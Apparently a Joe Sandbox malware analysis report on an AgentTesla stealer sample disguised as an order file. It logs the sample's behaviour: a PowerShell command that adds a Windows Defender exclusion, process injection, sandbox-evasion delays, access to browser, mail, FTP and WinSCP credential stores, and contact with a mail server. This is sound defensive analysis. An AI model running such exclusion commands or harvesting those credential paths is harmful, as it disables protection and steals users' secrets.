                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 99875Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 99766Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 99656Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 99547Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 99414Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 99297Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 99174Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 99047Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 98936Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 98821Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 98703Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 98594Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 98469Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 98344Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 98234Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 98125Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 98015Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 97906Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 97797Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: order2024-10-07_174915.exe, 00000008.00000002.2502442913.00000000010A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe"
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe"Jump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeMemory written: C:\Users\user\Desktop\order2024-10-07_174915.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess created: C:\Users\user\Desktop\order2024-10-07_174915.exe "C:\Users\user\Desktop\order2024-10-07_174915.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess created: C:\Users\user\Desktop\order2024-10-07_174915.exe "C:\Users\user\Desktop\order2024-10-07_174915.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Users\user\Desktop\order2024-10-07_174915.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Users\user\Desktop\order2024-10-07_174915.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: 00000008.00000002.2504284574.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2504284574.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: order2024-10-07_174915.exe PID: 4472, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.order2024-10-07_174915.exe.450d9e0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.order2024-10-07_174915.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.order2024-10-07_174915.exe.4536a00.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.order2024-10-07_174915.exe.450d9e0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1282489119.000000000450D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2501932436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1282489119.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 00000008.00000002.2504284574.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: order2024-10-07_174915.exe PID: 4472, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: 00000008.00000002.2504284574.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2504284574.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: order2024-10-07_174915.exe PID: 4472, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.order2024-10-07_174915.exe.450d9e0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.order2024-10-07_174915.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.order2024-10-07_174915.exe.4536a00.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.order2024-10-07_174915.exe.450d9e0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1282489119.000000000450D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2501932436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1282489119.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		111
                      Process Injection                      		1
                      Masquerading                      		2
                      OS Credential Dumping                      		111
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		1
                      Credentials in Registry                      		1
                      Process Discovery                      		Remote Desktop Protocol11
                      Archive Collected Data                      		1
                      Non-Standard Port                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
                      Virtualization/Sandbox Evasion                      		Security Account Manager141
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares2
                      Data from Local System                      		1
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture11
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets1
                      File and Directory Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                      Obfuscated Files or Information                      		Cached Domain Credentials24
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                      Software Packing                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528372 Sample: order2024-10-07_174915.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 26 mail.mbarieservicesltd.com 2->26 28 18.31.95.13.in-addr.arpa 2->28 32 Suricata IDS alerts for network traffic 2->32 34 Found malware configuration 2->34 36 Multi AV Scanner detection for submitted file 2->36 38 8 other signatures 2->38 8 order2024-10-07_174915.exe 4 2->8         started        signatures3 process4 file5 24 C:\Users\...\order2024-10-07_174915.exe.log, ASCII 8->24 dropped 40 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->40 42 Adds a directory exclusion to Windows Defender 8->42 44 Injects a PE file into a foreign processes 8->44 12 order2024-10-07_174915.exe 2 8->12         started        16 powershell.exe 23 8->16         started        18 order2024-10-07_174915.exe 8->18         started        signatures6 process7 dnsIp8 30 mail.mbarieservicesltd.com 199.79.62.115, 49704, 587 PUBLIC-DOMAIN-REGISTRYUS United States 12->30 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->46 48 Tries to steal Mail credentials (via file / registry access) 12->48 50 Tries to harvest and steal ftp login credentials 12->50 52 Tries to harvest and steal browser information (history, passwords, etc) 12->52 54 Loading BitLocker PowerShell Module 16->54 20 WmiPrvSE.exe 16->20         started        22 conhost.exe 16->22         started        signatures9 process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      order2024-10-07_174915.exe53%ReversingLabsByteCode-MSIL.Trojan.GenSteal
                      order2024-10-07_174915.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.mbarieservicesltd.com
                      		199.79.62.115
                      		truetrue
                        		unknown
                        18.31.95.13.in-addr.arpa
                        		unknown
                        		unknownfalse
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameorder2024-10-07_174915.exe, 00000000.00000002.1277438548.00000000032E1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://mail.mbarieservicesltd.comorder2024-10-07_174915.exe, 00000008.00000002.2504284574.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            199.79.62.115
                            		mail.mbarieservicesltd.comUnited States
                            		394695PUBLIC-DOMAIN-REGISTRYUStrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1528372
                            Start date and time:2024-10-07 21:17:09 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 8s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:20
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:order2024-10-07_174915.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@9/6@2/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 98%
                            • Number of executed functions: 142
                            • Number of non-executed functions: 11
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: order2024-10-07_174915.exe

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            15:18:08API Interceptor21x Sleep call for process: order2024-10-07_174915.exe modified
                            15:18:10API Interceptor19x Sleep call for process: powershell.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            199.79.62.115PO23100070.exeGet hashmaliciousAgentTeslaBrowse
                              PO-000001488.exeGet hashmaliciousAgentTeslaBrowse
                                Quote 20240533-REV2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  PO- 220135.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    Quote_4400201477.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
